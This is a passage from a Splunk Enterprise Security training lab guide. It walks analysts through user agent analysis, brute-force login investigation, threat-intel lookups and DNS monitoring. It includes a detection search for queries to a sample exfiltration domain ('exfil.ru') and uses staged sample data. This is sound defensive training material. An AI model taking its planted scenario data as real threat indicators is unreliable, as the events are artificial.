Note: based on this signature, this vulnerability is significant. You can now initiate a ticket with your IT
department to reconfigure the FTP servers to reduce the vulnerability.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 18
Module 6 Lab – Web Intelligence
Description
In this exercise, you will use the Web Intelligence dashboards to examine the potential issues posed by
internal threats.

Steps
Scenario: Periodically, you want to review the types of user agents accessing your HTTP resources.
The HTTP User Agent Analysis dashboard is very useful for this purpose.

Task 1: Perform HTTP User Agent analysis.

1. Navigate to Security Intelligence > Web Intelligence > HTTP User Agent Analysis.
2. Set the Standard Deviation Index selector to All and make sure the search range for the dashboard is
Last 24 hours.
3. Submit the search.
4. Examine the Key Indicators showing statistics about user agent (UA) string length.
Note: very short or very long UA strings can be a sign of malicious intent.
5. Examine the scatter chart in the User Agent Distribution panel. This chart shows the count for each user
agent. Scroll over the top few user agents for details.
6. Note that the User Agent Details panel sorts the http_user_agent list by descending length.
7. Examine some of the longer user agent strings in the User Agent Details list, looking for embedded SQL
or shell commands (common signs of attacks).
8. Look for the string “FunWebProducts” in one of the Mozilla user agent strings. You may have to navigate
through a few pages to find it.
Hint: It usually has a length of 116 characters.

While not technically malware, this is evidence that at least some of your desktops are running adware
on their browsers that is probably not good for your network.

Scenario: You have decided that “FunWebProducts” is not a threat and you would like to eliminate it
from the list of user agents. Your administrator has given the analyst role the capability to
use the per-panel filter tool.

Task 2: Use a per-panel filter.

9. Select the checkbox in the User Agent Details panel for the Mozilla “FunWebProducts” entry and click
the Per-panel Filter button.
10. Make sure Filter out these results... is selected and click Save.
11. Confirm the “FunWebProducts” entry is no longer displayed in the panels.

Scenario: Examine the web site categories users are accessing.

Task 3: Use the HTTP Category Analysis dashboard.

12. Navigate to Security Intelligence > Web Intelligence > HTTP Category Analysis.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 19
 The source events for this dashboard all come from one sample server and one sample user, so the
scatter chart shows a flat profile.
13. Examine some of the categories displayed in the lower panel. Sort this panel descending by count.
Many of these categories are uninteresting and could be excluded by filtering. However, some
categories, such as weapons, drugs, etc., may be cause for concern.
14. Locate a questionable category, such as weapons or drugs, and drill down.
15. You will see that the source events are from the Web data model.
16. Expand the details of one of the events.
17. Examine the fields available, such as dest, src, user, url, etc.
All of this data could be important if launching an investigation of inappropriate user behavior. You can
use one of these events to create an incident.
18. From the Event Actions menu, select Create notable event. Populate the form as follows:
Title: Inappropriate website access
Security Domain: Audit
Urgency: Medium
Owner: Unassigned
Status: Unassigned
Description: Investigate user access to this suspicious website.
19. Click Save. Your new incident displays on the Incident Review dashboard. (You may need to refresh for
the new notable to appear.)
This can be the initiation of an investigation into the user’s activities.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 20
Module 7 Lab – User Intelligence
Description
In this lab exercise, you will use the dashboards in the User Intelligence menu to examine the potential issues
posed by internal threats.

Steps
Scenario: You are continuing your investigation into the incidents from the preceding exercise. You
want to find out more about the assets and identities involved.

Task 1: Examine and learn more about the Hax0r user account.

1. Navigate to Security Intelligence > User Intelligence > Identity Investigator.

2. Enter Hax0r in the search field, set the time range (under the list of swimlanes) to Last 24 hours, and click
Search.
3. Examine the events in the All Authentication swim lane and notice that Hax0r has been attempting to log
in quite frequently. (A darker bar means more events in that time period.)
4. Use the pan/zoom controls at the bottom of the swim lanes to zoom in on the time just before and after the
last notable event to make it easier to see the pattern of logon events in the All Authentication swim lane.
5. Notice that the authentication events come in bursts, with many attempts in a very short time frame.
6. Click the bars in the All Authentication swim lane to see the event details on the right. Note fields like the
src, dest, user, action and number of events.
The action is failure, indicating a failed login.
7. Make a note of the dest field value (HOST-001).

In the details side bar, there are options to drill down into the source events , share this result ,
or create a notable event .
8. Click a bar in the Notable Events swim lane to see the details of the notable event generated.

Task 2: Investigate the server that Hax0r is attempting to access.

9. Navigate to Security Intelligence > User Intelligence > Asset Investigator.

10. On the Asset Investigator, enter the host name you discovered while investigating Hax0r’s activities
(HOST-001).
11. Make sure the time range is Last 24 hours and that the pan/zoom controls at bottom are expanded to the
full length of the time range.
12. ES displays the details for HOST-001. This information is pulled from the Assets managed lookup file.
13. Examine the details of some of the events in the different swim lanes including All Changes, Malware
Attacks, Notable Events, and Risk Modifiers. These events are focused on HOST-001. However, the All
Authentication swimlane displays any event where HOST-001 is present.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 21
Scenario: After working with the Hax0r incident, you want to get an overview of user activity in your
environment to check for insider threats.

Task 3: Use the User Activity and Access Anomalies dashboards.

14. Navigate to Security Intelligence > User Intelligence > User Activity.
15. By default, the dashboard shows all user activity over the last 24 hours. Examine the Key Indicator
values.
16. Some users have elevated Risk Scores. Examine the users in the Non-corporate Email Activity and
Non-corporate Web Uploads panels. This could indicate dangerous activity by these users.
17. Select the user admin in the Non-corporate Web Uploads panel. This opens the Identity Investigator
dashboard for the user.
Initially, the default collection of swim lanes is displayed but there is an alternative set of lanes for
investigating user activity.
18. Click the Edit icon above the list of swim lane names. Select the User Activity collection and close the
modal using the X in the upper right corner. Make sure the time range picker is set to Last 24 hours.
19. You now see many events in the Non-corporate Web Uploads swim lane. Click one of the darker bars,
indicating a large number of events in that time period.
20. Examine the details on the right: the number of events indicated, the time range, and options to share the
results or create a notable event.
21. Click the icon to open the source events in a drill down search.
This data comes from the Web data model. Some of the useful fields are src, dest, and url.
22. Close the drill down search window.

Scenario: Examine the pattern of geographic access by your users.

Task 4: Use the Access Anomalies and Access Search dashboards.

23. Navigate to Security Intelligence > User Intelligence > Access Anomalies and notice that the search
executes by default over the last 60 minutes.
24. Scroll down to Concurrent Application Accesses and note the list of anomalous access incidents.
25. Examine the app values, such as sshd.
It is not surprising to see sshd events that happen concurrently in remote locations, but login or
windows:local would be more suspicious.
26. Click on an sshd row and examine the drill down results.
27. Return to the Access Anomalies dashboard and hover your mouse over the pie charts in the map.
28. Examine the summary of event statistics.
29. Drill down on the pie charts to see more details.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 22
Module 8 Lab – Threat Intelligence
Description
In this lab exercise, you will use the Threat Intelligence dashboards to examine the potential issues posed by
internal (user) and external threats. For an extended example of the internal threat tools, see
http://docs.splunk.com/Documentation/ES/latest/User/ThreatIntelligence.

Steps
Scenario: As a network security analyst, you want to be aware of any threat activity in your
environment.

Task 1: Review threat activity.

1. Use the Incident Review dashboard to search for all Threat domain notables in the Last 24 hours.
2. Examine the details of a few of the results.
3. You can run ad hoc searches to see what types of threats you are dealing with. Navigate to Search >
Search.
4. Execute the following search over the Last 24 hours:
`notable` | stats count by threat_source_type
You are using the `notable` macro, which searches in the notable index and then adds all incident
values such as owner, status, etc. There are both CSV and STIX sources.
CSV sources are simple threat lists of IP addresses with no additional information—all you know is
that you are connected to a malicious site. The name of the list (threat_source_id) can tell you
something about the type of threat.
STIX, on the other hand, is a detailed threat information source from a TAXII server. This allows the
Threat Activity Detected correlation search to look beyond simple IP addresses.
5. Execute the following search over the Last 24 hours:
`notable` | search threat_match_field = file_name | fields threat* dest
6. Examine the information available in these events.
This information comes from the STIX content downloaded from the TAXII server from Mandiant. This
information indicates files with names known to be associated with malware downloads.
7. In the top result event, locate the dest field and copy it to the clipboard. This is one of the servers where
a suspect file has been downloaded.
8. Navigate to Security Intelligence > Threat Intelligence > Threat Activity and notice this view shows you
all activity associated with threat intelligence over the search period (default 24 hours), not just threat
notable events.
9. Examine some of the Key Indicator values and panel contents.
10. Change the Search filter field to Destination and paste the dest field value you copied to the clipboard
earlier.
11. Click Submit. The Threat Activity Details panel now shows the specific threat sources and details
against this asset.
12. Navigate to Security Intelligence > Threat Intelligence > Threat Artifacts.
The Threat Overview panel displays a list of the threat intelligence sources—i.e., threat lists (CSV) or
advanced threat data (STIX or OpenIOC).
The other panels show a summary of artifacts (data from the threat intelligence) by type—Endpoint,
Network, Certificate, and Email.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 23
13. Click the Network tab and review the information in the IP Intelligence panel. Notice the data includes the
IP address, location (city and country), and threat_group.
14. Review the domain data of the artifact in the Domain Intelligence panel.
15. Review the information on the Endpoint and Certificate tabs.

Task 2: Add a local IP address to the ip_intel KV Store collection.

16. Open a search bar and use the makeresults command to create a populating search for the IP address
192.168.1.95 with the phrase “payroll watch list”.
| makeresults 1
| eval description="payroll watch list", ip="192.168.1.95", weight="1"
17. Add the data to the local_ip_intel lookup in the KV Store.
| makeresults 1
| eval description="payroll watch list", ip="192.168.1.95", weight="1"
| outputlookup local_ip_intel append=t
18. Ensure that the IP from your search was added to the local_ip_intel lookup in the KV Store collection.
| inputlookup local_ip_intel | reverse
Note: since there are many entries in the local_ip_intel list, using the reverse command will show the
newly added entry at the top.
19. Navigate to Configure > Content> Content Management and filter on Local IP Intel.
20. Click the Local IP Intel lookup and confirm that 192.168.1.95 entry has been added to the lookup.
Note: scroll to the bottom of the list to see the new entry.
21. Click Cancel to exit.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 24
Module 9 Lab – Protocol Intelligence
Description
In this lab exercise, you will work with the Protocol Intelligence dashboards.

Steps
Scenario: As a network security professional, you routinely monitor the status of network activity
using Protocol Intelligence.

Task 1: Use Protocol Intelligence.

1. Navigate to Security Intelligence > Protocol Intelligence > Protocol Center.

2. Examine the panel contents.
3. In the Connections by Protocol panel, click the http segment to see a report of the HTTP connections
by server.
4. Return to the Protocol Center dashboard.
5. In the Usage for Well Known Ports panel, click the dest_port value in the first row.
6. Examine details about the port in the Traffic Search dashboard, including a summary in the top panel,
and individual events in the bottom panel.
7. Expand one of the events in the bottom panel and examine the fields available for analysis.
8. Navigate to Security Intelligence > Protocol Intelligence > DNS Activity.
9. Examine the available data broken down by query sources, DNS, and domain, as well as the most recent
queries. Make sure the Time Range Picker is set to Last 24 hours.
10. In the Top DNS Queries panel, locate the Doc.exfil.ru domain name. (You may have to sroll through the
pages of results to locate it.)
This is a suspicious domain name and warrants further investigation.
11. Click Doc.exfil.ru to open a new search for this DNS query in the DNS Search dashboard.
12. Examine some of the systems (dest) making DNS queries for this domain—there seem to be a lot!
13. To investigate further, execute the following search over the Last 24 hours.
| datamodel Network_Resolution DNS search | search DNS.query=*exfil.ru
This search shows all DNS resolution queries for any servers in the exfil.ru domain.
You see many queries happening in your network—this is a possible indicator of data exfiltration
occurring.
In a real environment, you would open a new investigation immediately and add this search to it.
14. Navigate to Security Intelligence > Protocol Intelligence > SSL Activity and examine the available
data.
15. Note the breakdown of connections by common domain name, as well as recent SSL sessions showing
authentication issuer, start and end time, and validity.
16. Navigate to the Security Intelligence > Protocol Intelligence > Email Activity dashboard.
Here you see the most prolific email senders, as well as rare senders and receivers. This can be
useful to identify suspicious email activity.
17. Click one of the results under Rarely Seen Senders to open the Email Search dashboard.
You will see a report of that sender’s emails and the associated raw events.
18. Expand one of the email events to see the details collected.
19. Note that the body of the email is not collected, but the events do include a summary of the body contents
in content_body and content_transfer_encoding, such as any embedded URLs.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 25